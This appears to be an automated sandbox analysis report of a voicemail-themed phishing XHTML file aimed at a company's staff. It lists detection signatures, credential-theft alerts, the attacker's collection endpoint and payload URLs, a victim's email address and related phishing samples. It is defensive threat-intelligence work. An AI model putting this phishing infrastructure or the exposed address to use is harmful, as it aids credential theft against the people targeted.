Edit tour

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml

Overview

General Information

Sample name:	#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml renamed because original name is a hash value
Original sample name:	Audio_Msg Junklessfoods.xhtml
Analysis ID:	1648229
MD5:	6d100346b0d3516c43b388901bac0fbc
SHA1:	0bb4ed60499d155aea77fb45b6965ce5b989dd66
SHA256:	3223e1c35cc26f15fc91336236f99193e65c4dae227be3d4acb64e993402c62a
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

HTML IFrame injector detected

HTML Script injector detected

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

JA3 SSL client fingerprint seen in connection with other malware

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,11957968465846349411,11465432592597063295,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2012 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-25T17:13:48.696032+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49750	104.168.138.190	443	TCP
2025-03-25T17:14:15.762742+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49757	104.168.138.190	443	TCP
2025-03-25T17:14:27.429220+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49769	104.168.138.190	443	TCP
2025-03-25T17:14:36.292839+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49778	104.168.138.190	443	TCP
2025-03-25T17:15:06.801563+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49787	104.168.138.190	443	TCP
2025-03-25T17:15:18.713203+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49793	104.168.138.190	443	TCP
2025-03-25T17:16:08.106604+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49798	104.168.138.190	443	TCP
2025-03-25T17:16:16.824420+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49803	104.168.138.190	443	TCP

HTTP traffic detected: POST /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 62sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_68.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_70.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_70.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 142.250.80.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir5972_1689736917

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir5972_1689736917

Jump to behavior

Source: classification engine

Classification label: mal76.phis.winXHTML@22/23@30/16

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,11957968465846349411,11465432592597063295,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2012 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,11957968465846349411,11465432592597063295,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2012 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	0%	Avira URL Cloud	safe
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com	0%	Avira URL Cloud	safe
https://avcbtech.site/kuk/xwps.php	0%	Avira URL Cloud	safe
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0010.t-0009.t-msedge.net	13.107.246.38	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.66.137	true	false	high
s-part-0041.t-0009.t-msedge.net	13.107.246.69	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.250.80.68	true	false	high
api.ipify.org	104.26.12.205	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8248._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	true	Avira URL Cloud: safe	unknown
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com	true	Avira URL Cloud: safe	unknown
https://avcbtech.site/kuk/xwps.php	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_70.2.dr	false		high
https://getbootstrap.com)	chromecache_70.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.80.68	www.google.com	United States	15169	GOOGLEUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
199.232.192.193	unknown	United States	54113	FASTLYUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.6
192.168.2.23
192.168.2.13
192.168.2.14

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1648229
Start date and time:	2025-03-25 17:12:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml renamed because original name is a hash value
Original Sample Name:	Audio_Msg Junklessfoods.xhtml
Detection:	MAL
Classification:	mal76.phis.winXHTML@22/23@30/16
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.65.238, 142.251.40.227, 172.217.165.142, 64.233.180.84, 142.251.35.174, 142.250.80.14, 142.250.80.46, 142.250.72.106, 199.232.210.172, 23.203.176.221, 199.232.214.172, 142.250.80.110, 142.251.40.206, 142.250.65.174, 142.251.40.110, 142.250.81.238, 142.250.72.99, 142.250.80.67, 142.250.80.78, 142.250.65.206, 184.31.69.3, 13.107.246.69, 13.107.246.38, 4.175.87.197
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.174.100.20	#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml	Get hash	malicious	HTMLPhisher	Browse
	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
151.101.66.137	http://facebooksecurity.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://site9615380.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js
	http://grandprairie-water-damage-restoration.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	2023121142000021ki01kvjs.html	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-latest.min.js
199.232.196.193	setup.exe	Get hash	malicious	Xmrig	Browse	i.imgur.com/FzGMM7P.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0010.t-0009.t-msedge.net	Shitstain.exe	Get hash	malicious	AnarchyGrabber, AsyncRAT, DBatLoader, Discord Token Stealer, FritzFrog, HawkEye, Lokibot	Browse	13.107.246.38
	http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	AliareV0.1.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	13.107.246.38
	Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msg	Get hash	malicious	Unknown	Browse	13.107.246.38
	https://1drv.ms/o/c/8fc032da5fada757/EgEHU26Ga4FAl_1Su2lfpkUBqQItqpp0mP4_5cipPDmMcg?e=PyJVMi	Get hash	malicious	Unknown	Browse	13.107.246.38
	PURCHASE ORDER 5172025.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.38
	YourToDo.svg	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	https://jainiklifesciences.com/proposals	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.107.246.38
	https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459e	Get hash	malicious	Unknown	Browse	13.107.246.38
code.jquery.com	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.66.137
	4354_QB_Paymt_Statemnt.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://app.kortex.co/public/document/8838161b-5f2e-4b7c-b66b-ddfd9db20ecd	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.2.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	Workspace Update.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://antiphishing.vadesecure.com/v4?f=NFZ1OXFVNUpJaXhxbWN3aw79TqTxGVr5HS_rj8xy-Dtt3WuOYgiNsT7kSrCL4neS&i=dnZZY1BRdGVud2p5a3J2MkXgKVQslibyjliaROaA9Kc&k=ylKZ&r=eVhRazAzQWpzQlVhVVRabfl7Btopt7tCs6Jhtvvo_JQliQyVoVTnThNthFfLLOv7XziSix9lmqfR7qqdZtpsOw&s=427052c2cb55a4ea4f9c70929c499bda58414514c5d12af8c66341946b20b817&u=https%3A%2F%2Fzmk5ybt5uw.us-east-1.awsapprunner.com%2F%23Xavier.Regnault%40chantiers-atlantique.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	suspectTelling clean needful (78.2 KB).msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	http://www.bordgaisenergytheatre.ie	Get hash	malicious	Unknown	Browse	151.101.2.137
office.avcbtech.store	#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	kmips.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	arm5.elf	Get hash	malicious	Unknown	Browse	104.245.241.64
	#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
